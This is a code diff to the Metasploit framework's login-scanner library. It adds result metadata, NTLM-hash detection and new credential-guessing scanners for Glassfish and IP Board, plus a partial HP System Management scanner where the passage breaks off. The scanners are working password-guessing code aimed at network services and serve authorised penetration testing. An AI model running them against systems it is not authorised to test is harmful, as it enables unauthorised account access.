@@ -8,7 +8,12 @@ require 'metasploit/framework/command/base'
 # Based on pattern used for lib/rails/commands in the railties gem.
 class Metasploit::Framework::Command::Console < Metasploit::Framework::Command::Base
  def start
-    driver.run
+    case parsed_options.options.subcommand
+    when :version
+      $stderr.puts "Framework Version: #{Metasploit::Framework::VERSION}"
+    else
+      driver.run
+    end
  end

  private
@@ -37,6 +42,7 @@ class Metasploit::Framework::Command::Console < Metasploit::Framework::Command::

      driver_options = {}
      driver_options['Config'] = options.framework.config
+      driver_options['ConfirmExit'] = options.console.confirm_exit
      driver_options['DatabaseEnv'] = options.environment
      driver_options['DatabaseMigrationPaths'] = options.database.migrations_paths
      driver_options['DatabaseYAML'] = options.database.config
@@ -23,9 +23,12 @@ module Metasploit::Framework::CommonEngine
      Encoding.default_internal = encoding
    end

+    config.root = Msf::Config::install_root
    config.paths.add 'data/meterpreter', glob: '**/ext_*'
    config.paths.add 'modules'

+    config.active_support.deprecation = :notify
+
    #
    # `initializer`s
    #
@@ -91,6 +91,20 @@ module Metasploit
        self        
      end

+      # This method takes all of the attributes of the {Credential} and spits
+      # them out in a hash compatible with the create_credential calls.
+      #
+      # @return [Hash] a hash compatible with #create_credential
+      def to_h
+        {
+            private_data: private,
+            private_type: private_type,
+            username: public,
+            realm_key: realm_key,
+            realm_value: realm
+        }
+      end
+
      private

      def at_realm
@@ -86,18 +86,18 @@ class Metasploit::Framework::CredentialCollection

    if username.present?
      if password.present?
-        yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm)
+        yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm, private_type: private_type(password))
      end
      if user_as_pass
-        yield Metasploit::Framework::Credential.new(public: username, private: username, realm: realm)
+        yield Metasploit::Framework::Credential.new(public: username, private: username, realm: realm, private_type: :password)
      end
      if blank_passwords
-        yield Metasploit::Framework::Credential.new(public: username, private: "", realm: realm)
+        yield Metasploit::Framework::Credential.new(public: username, private: "", realm: realm, private_type: :password)
      end
      if pass_fd
        pass_fd.each_line do |pass_from_file|
          pass_from_file.chomp!
-          yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm)
+          yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
        end
        pass_fd.seek(0)
      end
@@ -108,18 +108,18 @@ class Metasploit::Framework::CredentialCollection
        user_fd.each_line do |user_from_file|
          user_from_file.chomp!
          if password
-            yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm)
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm, private_type: private_type(password) )
          end
          if user_as_pass
-            yield Metasploit::Framework::Credential.new(public: user_from_file, private: user_from_file, realm: realm)
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: user_from_file, realm: realm, private_type: :password)
          end
          if blank_passwords
-            yield Metasploit::Framework::Credential.new(public: user_from_file, private: "", realm: realm)
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: "", realm: realm, private_type: :password)
          end
          if pass_fd
            pass_fd.each_line do |pass_from_file|
              pass_from_file.chomp!
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm)
+              yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
            end
            pass_fd.seek(0)
          end
@@ -145,4 +145,14 @@ class Metasploit::Framework::CredentialCollection
    pass_fd.close if pass_fd && !pass_fd.closed?
  end

+  private
+
+  def private_type(private)
+    if private =~ /[0-9a-f]{32}:[0-9a-f]{32}/
+      :ntlm_hash
+    else
+      :password
+    end
+  end
+
 end
@@ -1,14 +1,100 @@
 require 'metasploit/framework'
+require 'msf/base/config'

 module Metasploit
  module Framework
    module Database
-      def self.configurations
-        YAML.load_file(configurations_pathname)
+      #
+      # CONSTANTS
+      #
+
+      CONFIGURATIONS_PATHNAME_PRECEDENCE = [
+          :environment_configurations_pathname,
+          :user_configurations_pathname,
+          :project_configurations_pathname
+      ]
+
+      #
+      # Module Methods
+      #
+
+      # Returns first configuration pathname from {configuration_pathnames} or the overridding `:path`.
+      #
+      # @param options [Hash{Symbol=>String}]
+      # @option options [String] :path Path to use instead of first element of {configurations_pathnames}
+      # @return [Pathname] if configuration pathname exists.
+      # @return [nil] if configuration pathname does not exist.
+      def self.configurations_pathname(options={})
+        options.assert_valid_keys(:path)
+
+        path = options[:path]
+
+        if path.present?
+          pathname = Pathname.new(path)
+        else
+          pathname = configurations_pathnames.first
+        end
+
+        if pathname.present? && pathname.exist?
+          pathname
+        else
+          nil
+        end
      end

-      def self.configurations_pathname
-        Metasploit::Framework::Application.paths['config/database'].first
+      # Return configuration pathnames that exist.
+      #
+      # Returns `Pathnames` in order of precedence
+      #
+      # 1. {environment_configurations_pathname}
+      # 2. {user_configurations_pathname}
+      # 3. {project_configurations_pathname}
+      #
+      # @return [Array<Pathname>]
+      def self.configurations_pathnames
+        configurations_pathnames = []
+
+        CONFIGURATIONS_PATHNAME_PRECEDENCE.each do |configurations_pathname_message|
+          configurations_pathname = public_send(configurations_pathname_message)
+
+          if !configurations_pathname.nil? && configurations_pathname.exist?
+            configurations_pathnames << configurations_pathname
+          end
+        end
+
+        configurations_pathnames
+      end
+
+      # Pathname to `database.yml` pointed to by `MSF_DATABASE_CONFIG` environment variable.
+      #
+      # @return [Pathname] if `MSF_DATABASE_CONFIG` is not blank.
+      # @return [nil] otherwise
+      def self.environment_configurations_pathname
+        msf_database_config = ENV['MSF_DATABASE_CONFIG']
+
+        if msf_database_config.blank?
+          msf_database_config = nil
+        else
+          msf_database_config = Pathname.new(msf_database_config)
+        end
+
+        msf_database_config
+      end
+
+      # Pathname to `database.yml` for the metasploit-framework project in `config/database.yml`.
+      #
+      # @return [Pathname]
+      def self.project_configurations_pathname
+        root = Pathname.new(__FILE__).realpath.parent.parent.parent.parent
+        root.join('config', 'database.yml')
+      end
+
+      # Pathname to `database.yml` in the user's config directory.
+      #
+      # @return [Pathname] if the user has a `database.yml` in their config directory (`~/.msf4` by default).
+      # @return [nil] if the user does not have a `database.yml` in their config directory.
+      def self.user_configurations_pathname
+        Pathname.new(Msf::Config.get_config_root).join('database.yml')
      end
    end
  end
@@ -0,0 +1,36 @@
+require 'metasploit/framework/database'
+
+module Metasploit::Framework::Database::Cucumber
+  def self.project_configurations_path
+    Rails.root.join('config', 'database.yml').to_path
+  end
+
+  def self.backup_project_configurations
+    if File.exist?(project_configurations_path)
+      # assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
+      # just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
+      if File.exist?(backup_project_configurations_path)
+        File.delete(project_configurations_path)
+      else
+        # project contains the real database.yml and there was no previous, aborted run.
+        File.rename(project_configurations_path, backup_project_configurations_path)
+      end
+    end
+  end
+
+  def self.backup_project_configurations_path
+    "#{project_configurations_path}.cucumber.bak"
+  end
+
+  def self.restore_project_configurations
+    if File.exist?(backup_project_configurations_path)
+      if File.exist?(project_configurations_path)
+        # Remove fake, leftover database.yml
+        File.delete(project_configurations_path)
+      end
+
+      File.rename(backup_project_configurations_path, project_configurations_path)
+    end
+  end
+end
+
@@ -35,7 +35,12 @@ module Metasploit
            status = (success == true) ? Metasploit::Model::Login::Status::SUCCESSFUL : Metasploit::Model::Login::Status::INCORRECT
          end

-          Result.new(credential: credential, status: status)
+          result = Result.new(credential: credential, status: status)
+          result.host         = host
+          result.port         = port
+          result.protocol     = 'tcp'
+          result.service_name = 'afp'
+          result
        end

        def set_sane_defaults
@@ -20,9 +20,20 @@ module Metasploit
            host, port, {}, ssl, ssl_version
          )

+          http_client = config_client(http_client)
+
          result_opts = {
-              credential: credential
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'tcp'
          }
+          if ssl
+            result_opts[:service_name] = 'https'
+          else
+            result_opts[:service_name] = 'http'
+          end
+
          begin
            http_client.connect
            body = "userName=#{Rex::Text.uri_encode(credential.public)}&password=#{Rex::Text.uri_encode(credential.private)}&submit=+Login+"
@@ -77,6 +77,14 @@ module Metasploit
            raise NotImplementedError
          end

+          # @note Override this to detect that the service is up, is the right
+          #   version, etc.
+          # @return [false] Indicates there were no errors
+          # @return [String] a human-readable error message describing why
+          #   this scanner can't run
+          def check_setup
+            false
+          end

          def each_credential
            cred_details.each do |raw_cred|
@@ -85,6 +93,11 @@ module Metasploit
              credential = raw_cred.to_credential

              if credential.realm.present? && self.class::REALM_KEY.present?
+                # The class's realm_key will always be the right thing for the
+                # service it knows how to login to. Override the credential's
+                # realm_key if one exists for the class. This can happen for
+                # example when we have creds for DB2 and want to try them
+                # against Postgres.
                credential.realm_key = self.class::REALM_KEY
                yield credential
              elsif credential.realm.blank? && self.class::REALM_KEY.present? && self.class::DEFAULT_REALM.present?
@@ -93,12 +106,14 @@ module Metasploit
                yield credential
              elsif credential.realm.present? && self.class::REALM_KEY.blank?
                second_cred = credential.dup
-                # Strip the realm off here, as we don't want it
+                # This service has no realm key, so the realm will be
+                # meaningless. Strip it off.
                credential.realm = nil
                credential.realm_key = nil
                yield credential
                # Some services can take a domain in the username like this even though
                # they do not explicitly take a domain as part of the protocol.
+                # e.g., telnet
                second_cred.public = "#{second_cred.realm}\\#{second_cred.public}"
                second_cred.realm = nil
                second_cred.realm_key = nil
@@ -46,7 +46,12 @@ module Metasploit
            })
          end

-          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+          result = ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+          result.host         = host
+          result.port         = port
+          result.protocol     = 'tcp'
+          result.service_name = 'db2'
+          result
        end

        private
@@ -41,7 +41,7 @@ module Metasploit

          begin
            success = connect_login(credential.public, credential.private)
-          rescue ::EOFError,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
+          rescue ::EOFError, Errno::ECONNRESET,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
            success = false
          end
@@ -53,8 +53,12 @@ module Metasploit
            result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
          end

-          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
-
+          result = ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+          result.host         = host
+          result.port         = port
+          result.protocol     = 'tcp'
+          result.service_name = 'ftp'
+          result
        end

        private
@@ -0,0 +1,221 @@
+
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # The Glassfish HTTP LoginScanner class provides methods to do login routines
+      # for Glassfish 2, 3 and 4.
+      class Glassfish < HTTP
+
+        DEFAULT_PORT  = 4848
+        PRIVATE_TYPES = [ :password ]
+
+        # @!attribute [r] version
+        #   @return [String] Glassfish version
+        attr_reader :version
+
+        # @!attribute jsession
+        #   @return [String] Cookie session
+        attr_accessor :jsession
+
+        # (see Base#check_setup)
+        def check_setup
+          begin
+            res = send_request({'uri' => '/common/index.jsf'})
+            return "Connection failed" if res.nil?
+            if !([200, 302].include?(res.code))
+              return "Unexpected HTTP response code #{res.code} (is this really Glassfish?)"
+            end
+
+            # If remote login is enabled on 4.x, it redirects to https on the
+            # same port.
+            if !self.ssl && res.headers['Location'] =~ /^https:/
+              self.ssl = true
+              res = send_request({'uri' => '/common/index.jsf'})
+              if res.nil?
+                return "Connection failed after SSL redirection"
+              end
+              if res.code != 200
+                return "Unexpected HTTP response code #{res.code} after SSL redirection (is this really Glassfish?)"
+              end
+            end
+
+            res = send_request({'uri' => '/login.jsf'})
+            return "Connection failed" if res.nil?
+            extract_version(res.headers['Server'])
+
+            if @version.nil? || @version !~ /^[2349]/
+              return "Unsupported version ('#{@version}')"
+            end
+          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
+            return "Unable to connect to target"
+          end
+
+          false
+        end
+
+        # Sends a HTTP request with Rex
+        #
+        # @param (see Rex::Proto::Http::Resquest#request_raw)
+        # @return [Rex::Proto::Http::Response] The HTTP response
+        def send_request(opts)
+          cli = Rex::Proto::Http::Client.new(host, port, {}, ssl, ssl_version)
+          cli.connect
+          req = cli.request_raw(opts)
+          res = cli.send_recv(req)
+
+          # Found a cookie? Set it. We're going to need it.
+          if res && res.get_cookies =~ /JSESSIONID=(\w*);/i
+            self.jsession = $1
+          end
+
+          res
+        end
+
+
+        # As of Sep 2014, if Secure Admin is disabled, it simply means the admin isn't allowed
+        # to login remotely. However, the authentication will still run and hint whether the
+        # password is correct or not.
+        #
+        # @param res [Rex::Proto::Http::Response] The HTTP auth response
+        # @return [boolean] True if disabled, otherwise false
+        def is_secure_admin_disabled?(res)
+          return (res.body =~ /Secure Admin must be enabled/i) ? true : false
+        end
+
+
+        # Sends a login request
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Rex::Proto::Http::Response] The HTTP auth response
+        def try_login(credential)
+          data  = "j_username=#{Rex::Text.uri_encode(credential.public)}&"
+          data << "j_password=#{Rex::Text.uri_encode(credential.private)}&"
+          data << 'loginButton=Login'
+
+          opts = {
+            'uri'     => '/j_security_check',
+            'method'  => 'POST',
+            'data'    => data,
+            'headers' => {
+              'Content-Type'   => 'application/x-www-form-urlencoded',
+              'Cookie'         => "JSESSIONID=#{self.jsession}",
+            }
+          }
+
+          send_request(opts)
+        end
+
+
+        # Tries to login to Glassfish version 2
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Hash]
+        #   * :status [Metasploit::Model::Login::Status]
+        #   * :proof [String] the HTTP response body
+        def try_glassfish_2(credential)
+          res = try_login(credential)
+          if res && res.code == 302
+            opts = {
+              'uri'     => '/applications/upload.jsf',
+              'method'  => 'GET',
+              'headers' => {
+                'Cookie'  => "JSESSIONID=#{self.jsession}"
+              }
+            }
+            res = send_request(opts)
+            p = /<title>Deploy Enterprise Applications\/Modules/
+            if (res && res.code.to_i == 200 && res.body.match(p) != nil)
+              return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body}
+            end
+          end
+
+          {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.body}
+        end
+
+
+        # Tries to login to Glassfish version 3 or 4 (as of now it's the latest)
+        #
+        # @param (see #try_glassfish_2)
+        # @return (see #try_glassfish_2)
+        def try_glassfish_3(credential)
+          res = try_login(credential)
+          if res && res.code == 302
+            opts = {
+              'uri'     => '/common/applications/uploadFrame.jsf',
+              'method'  => 'GET',
+              'headers' => {
+                'Cookie'  => "JSESSIONID=#{self.jsession}"
+              }
+            }
+            res = send_request(opts)
+
+            p = /<title>Deploy Applications or Modules/
+            if (res && res.code.to_i == 200 && res.body.match(p) != nil)
+              return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body}
+            end
+          elsif res && is_secure_admin_disabled?(res)
+            return {:status => Metasploit::Model::Login::Status::DENIED_ACCESS, :proof => res.body}
+          elsif res && res.code == 400
+            return {:status => Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, :proof => res.body}
+          end
+
+          {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.body}
+        end
+
+
+        # Decides which login routine and returns the results
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result]
+        def attempt_login(credential)
+          result_opts = { credential: credential }
+
+          begin
+            case self.version
+            when /^[29]\.x$/
+              status = try_glassfish_2(credential)
+              result_opts.merge!(status)
+            when /^[34]\./
+              status = try_glassfish_3(credential)
+              result_opts.merge!(status)
+            end
+          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+          end
+
+          Result.new(result_opts)
+        end
+
+        #
+        # Extract the target's glassfish version from the HTTP Server header
+        # (ex: Sun Java System Application Server 9.x)
+        #
+        # @param banner [String] `Server` header from a Glassfish service response
+        # @return [String] version string, e.g. '2.x'
+        # @return [nil] If the banner did not match any of the expected values
+        def extract_version(banner)
+          # Set version.  Some GlassFish servers return banner "GlassFish v3".
+          if banner =~ /(GlassFish Server|Open Source Edition)[[:blank:]]*(\d\.\d)/
+            @version = $2
+          elsif banner =~ /GlassFish v(\d)/
+            @version = $1
+          elsif banner =~ /Sun GlassFish Enterprise Server v2/
+            @version = '2.x'
+          elsif banner =~ /Sun Java System Application Server 9/
+            @version = '9.x'
+          else
+            @version = nil
+          end
+
+          return @version
+        end
+
+
+      end
+    end
+  end
+end
+
@@ -29,12 +29,48 @@ module Metasploit
        #   @return [String] HTTP method, e.g. "GET", "POST"
        attr_accessor :method

+        # @!attribute user_agent
+        #   @return [String] the User-Agent to use for the HTTP requests
+        attr_accessor :user_agent
+
+        # @!attribute vhost
+        #   @return [String] the Virtual Host name for the target Web Server
+        attr_accessor :vhost
+
+
        validates :uri, presence: true, length: { minimum: 1 }

        validates :method,
                  presence: true,
                  length: { minimum: 1 }

+        # (see Base#check_setup)
+        def check_setup
+          http_client = Rex::Proto::Http::Client.new(
+            host, port, {}, ssl, ssl_version
+          )
+          request = http_client.request_cgi(
+            'uri' => uri,
+            'method' => method
+          )
+
+          begin
+            # Use _send_recv instead of send_recv to skip automatiu
+            # authentication
+            response = http_client._send_recv(request)
+          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
+            error_message = "Unable to connect to target"
+          end
+
+          if !(response && response.code == 401 && response.headers['WWW-Authenticate'])
+            error_message = "No authentication required"
+          else
+            error_message = false
+          end
+
+          error_message
+        end
+
        # Attempt a single login with a single credential against the target.
        #
        # @param credential [Credential] The credential object to attempt to
@@ -46,13 +82,25 @@ module Metasploit
          result_opts = {
            credential: credential,
            status: Metasploit::Model::Login::Status::INCORRECT,
-            proof: nil
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
          }

+          if ssl
+            result_opts[:service_name] = 'https'
+          else
+            result_opts[:service_name] = 'http'
+          end
+
          http_client = Rex::Proto::Http::Client.new(
            host, port, {}, ssl, ssl_version,
            nil, credential.public, credential.private
          )
+
+          http_client = config_client(http_client)
+
          if credential.realm
            http_client.set_config('domain' => credential.realm)
          end
@@ -64,22 +112,11 @@ module Metasploit
              'method' => method
            )

-            # First try to connect without logging in to make sure this
-            # resource requires authentication. We use #_send_recv for
-            # that instead of #send_recv.
-            response = http_client._send_recv(request)
-            if response && response.code == 401 && response.headers['WWW-Authenticate']
-              # Now send the creds
-              response = http_client.send_auth(
-                response, request.opts, connection_timeout, true
-              )
-              if response && response.code == 200
-                result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response.headers)
-              end
-            else
-              result_opts.merge!(status: Metasploit::Model::Login::Status::NO_AUTH_REQUIRED)
+            response = http_client.send_recv(request)
+            if response && response.code == 200
+              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response.headers)
            end
-          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error
+          rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
          ensure
            http_client.close
@@ -90,6 +127,14 @@ module Metasploit

        private

+        def config_client(client)
+          client.set_config(
+            'vhost' => vhost || host,
+            'agent' => user_agent
+          )
+          client
+        end
+
        # This method sets the sane defaults for things
        # like timeouts and TCP evasion options
        def set_sane_defaults
@@ -13,6 +13,7 @@ module Metasploit
          @model = model

          errors = @model.errors.full_messages.join(', ')
+          errors << " (#{model.class.to_s})"
          super(errors)
        end
      end
@@ -0,0 +1,105 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # IP Board login scanner
+      class IPBoard < HTTP
+
+        # (see Base#attempt_login)
+        def attempt_login(credential)
+          http_client = Rex::Proto::Http::Client.new(
+              host, port, {}, ssl, ssl_version
+          )
+
+          http_client = config_client(http_client)
+
+          result_opts = {
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'tcp'
+          }
+          if ssl
+            result_opts[:service_name] = 'https'
+          else
+            result_opts[:service_name] = 'http'
+          end
+
+          begin
+            http_client.connect
+
+            nonce_request = http_client.request_cgi(
+                'uri' => uri,
+                'method'  => 'GET'
+            )
+
+            nonce_response = http_client.send_recv(nonce_request)
+
+            if nonce_response.body =~ /name='auth_key'\s+value='.*?((?:[a-z0-9]*))'/i
+              server_nonce = $1
+
+              if uri.end_with? '/'
+                base_uri = uri.gsub(/\/$/, '')
+              else
+                base_uri = uri
+              end
+
+              auth_uri = "#{base_uri}/index.php"
+
+              request = http_client.request_cgi(
+                'uri' => auth_uri,
+                'method'  => 'POST',
+                'vars_get' => {
+                  'app'     => 'core',
+                  'module'  => 'global',
+                  'section' => 'login',
+                  'do'      => 'process'
+                },
+                'vars_post'      => {
+                  'auth_key'     => server_nonce,
+                  'ips_username' => credential.public,
+                  'ips_password' => credential.private
+                }
+              )
+
+              response = http_client.send_recv(request)
+
+              if response && response.get_cookies.include?('ipsconnect') && response.get_cookies.include?('coppa')
+                result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response)
+              else
+                result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: response)
+              end
+
+            else
+              result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: "Server nonce not present, potentially not an IP Board install or bad URI.")
+            end
+          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+          end
+
+          Result.new(result_opts)
+
+        end
+
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.uri = "/forum/" if self.uri.nil?
+          @method = "POST".freeze
+
+          super
+        end
+
+        # The method *must* be "POST", so don't let the user change it
+        # @raise [RuntimeError]
+        def method=(_)
+          raise RuntimeError, "Method must be POST for IPBoard"
+        end
+
+      end
+    end
+  end
+end
+
@@ -34,7 +34,11 @@ module Metasploit

        def attempt_login(credential)
          result_options = {
-              credential: credential
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'tcp',
+              service_name: 'mssql'
          }

          begin
@@ -16,55 +16,70 @@ module Metasploit
        include Metasploit::Framework::Tcp::Client

        DEFAULT_PORT         = 3306
-        LIKELY_PORTS         = [ 3306 ]
-        LIKELY_SERVICE_NAMES = [ 'mysql' ]
-        PRIVATE_TYPES        = [ :password ]
-        REALM_KEY           = nil
+        LIKELY_PORTS         = [3306]
+        LIKELY_SERVICE_NAMES = ['mysql']
+        PRIVATE_TYPES        = [:password]
+        REALM_KEY            = nil

        def attempt_login(credential)
          result_options = {
-              credential: credential
+            credential:   credential,
+            host:         host,
+            port:         port,
+            protocol:     'tcp',
+            service_name: 'mysql'
          }

-          # manage our behind the scenes socket. Close any existing one and open a new one
-          disconnect if self.sock
-          connect
-
          begin
+            # manage our behind the scenes socket. Close any existing one and open a new one
+            disconnect if self.sock
+            connect
+
            ::RbMysql.connect({
-              :host           => host,
-              :port           => port,
-              :read_timeout   => 300,
-              :write_timeout  => 300,
-              :socket         => sock,
-              :user           => credential.public,
-              :password       => credential.private,
-              :db             => ''
+              :host          => host,
+              :port          => port,
+              :read_timeout  => 300,
+              :write_timeout => 300,
+              :socket        => sock,
+              :user          => credential.public,
+              :password      => credential.private,
+              :db            => ''
            })
-          rescue Errno::ECONNREFUSED
+
+          rescue Rex::HostUnreachable
            result_options.merge!({
              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
-              proof: "Connection refused"
+              proof:  "Host was unreachable"
+            })
+          rescue Errno::ECONNREFUSED, Rex::ConnectionRefused
+            result_options.merge!({
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof:  "Connection refused"
            })
          rescue RbMysql::ClientError
            result_options.merge!({
-                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
-                proof: "Connection timeout"
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof:  "Connection timeout"
            })
-          rescue Errno::ETIMEDOUT
+          rescue Errno::ETIMEDOUT, Rex::ConnectionTimeout
            result_options.merge!({
-                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
-                proof: "Operation Timed out"
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof:  "Operation Timed out"
            })
          rescue RbMysql::HostNotPrivileged
            result_options.merge!({
-                status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
-                proof: "Unable to login from this host due to policy"
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof:  "Unable to login from this host due to policy"
            })
          rescue RbMysql::AccessDeniedError
            result_options.merge!({
-                status: Metasploit::Model::Login::Status::INCORRECT,
-                proof: "Access Denied"
+              status: Metasploit::Model::Login::Status::INCORRECT,
+              proof:  "Access Denied"
+            })
+          rescue RbMysql::HostIsBlocked
+            result_options.merge!({
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof:  "Host blocked"
            })
          end

@@ -88,4 +103,4 @@ module Metasploit

    end
  end
-end
+end
@@ -26,7 +26,11 @@ module Metasploit
        def attempt_login(credential)
          result_options = {
            credential: credential,
-            status: Metasploit::Model::Login::Status::INCORRECT
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            host: host,
+            port: port,
+            protocol: 'tcp',
+            service_name: 'pop3'
          }

          disconnect if self.sock
@@ -23,7 +23,11 @@ module Metasploit
        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
        def attempt_login(credential)
          result_options = {
-              credential: credential
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'tcp',
+              service_name: 'postgres'
          }

          db_name = credential.realm || 'template1'
@@ -56,6 +60,8 @@ module Metasploit
                    proof: e.message
                })
            end
+          rescue Rex::ConnectionError, EOFError, Timeout::Error
+            result_options.merge!({status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT })
          end

          if pg_conn
@@ -8,43 +8,70 @@ module Metasploit
      class Result
        include ActiveModel::Validations

-        # @!attribute [r] access_level
+        # @!attribute access_level
        #   @return [String] the access level gained
-        attr_reader :access_level
-        # @!attribute [r] credential
+        attr_accessor :access_level
+        # @!attribute credential
        #   @return [Credential] the Credential object the result is for
-        attr_reader :credential
-        # @!attribute [r] proof
-        #   @return [String,nil] the proof that the lgoin was successful
-        attr_reader :proof
-        # @!attribute [r] status
+        attr_accessor :credential
+        # @!attribute host
+        #   @return [String] the addess of the target host for this result
+        attr_accessor :host
+        # @!attribute port
+        #   @return [Fixnum] the port number of the service for this result
+        attr_accessor :port
+        # @!attribute proof
+        #   @return [String,nil] the proof that the login was successful
+        attr_accessor :proof
+        # @!attribute protocol
+        #   @return [String] the transport protocol used for this result (tcp/udp)
+        attr_accessor :protocol
+        # @!attribute service_name
+        #   @return [String] the name to give the service for this result
+        attr_accessor :service_name
+        # @!attribute status
        #   @return [String] the status of the attempt. Should be a member of `Metasploit::Model::Login::Status::ALL`
-        attr_reader :status
+        attr_accessor :status

        validates :status,
          inclusion: {
              in: Metasploit::Model::Login::Status::ALL
          }

-        # @param [Hash] opts The options hash for the initializer
-        # @option opts [String] :private The private credential component
-        # @option opts [String] :proof The proof that the login was successful
-        # @option opts [String] :public The public credential component
-        # @option opts [String] :realm The realm credential component
-        # @option opts [String] :status The status code returned
-        def initialize(opts= {})
-          @access_level = opts.fetch(:access_level, nil)
-          @credential   = opts.fetch(:credential)
-          @proof        = opts.fetch(:proof, nil)
-          @status       = opts.fetch(:status)
+        # @param attributes [Hash{Symbol => String,nil}]
+        def initialize(attributes={})
+          attributes.each do |attribute, value|
+            public_send("#{attribute}=", value)
+          end
+        end
+
+        def inspect
+          "#<#{self.class} #{credential.public}:#{credential.private}@#{credential.realm} #{status} >"
        end

        def success?
          status == Metasploit::Model::Login::Status::SUCCESSFUL
        end

-        def inspect
-          "#<#{self.class} #{credential.public}:#{credential.private}@#{credential.realm} #{status} >"
+        # This method takes all the data inside the Result object
+        # and spits out a hash compatible with #create_credential
+        # and #create_credential_login.
+        #
+        # @return [Hash] the hash to use with #create_credential and #create_credential_login
+        def to_h
+          result_hash = credential.to_h
+          result_hash.merge!(
+              access_level: access_level,
+              address: host,
+              last_attempted_at: DateTime.now,
+              origin_type: :service,
+              port: port,
+              proof: proof,
+              protocol: protocol,
+              service_name: service_name,
+              status: status
+          )
+          result_hash.delete_if { |k,v| v.nil? }
        end

      end
@@ -149,7 +149,16 @@ module Metasploit
          begin
            connect
          rescue ::Rex::ConnectionError => e
-            return Result.new(credential:credential, status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
+            result = Result.new(
+              credential:credential,
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
+              proof: e,
+              host: host,
+              port: port,
+              protocol: 'tcp',
+              service_name: 'smb'
+            )
+            return result
          end
          proof = nil

@@ -212,7 +221,12 @@ module Metasploit
            access_level ||= AccessLevels::GUEST
          end

-          Result.new(credential: credential, status: status, proof: proof, access_level: access_level)
+          result = Result.new(credential: credential, status: status, proof: proof, access_level: access_level)
+          result.host         = host
+          result.port         = port
+          result.protocol     = 'tcp'
+          result.service_name = 'smb'
+          result
        end

        def connect
@@ -0,0 +1,58 @@
+
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # HP System Management login scanner tested on v6.3.1.24 upto v7.2.1.3 and 7.4
+      class Smh < HTTP
+
+        DEFAULT_PORT  = 4848
+        PRIVATE_TYPES = [ :password ]
+        CAN_GET_SESSION = true
+
+
+        # (see Base#attempt_login)
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential
+          }
+
+          req_opts = {
+            'method' => 'POST',
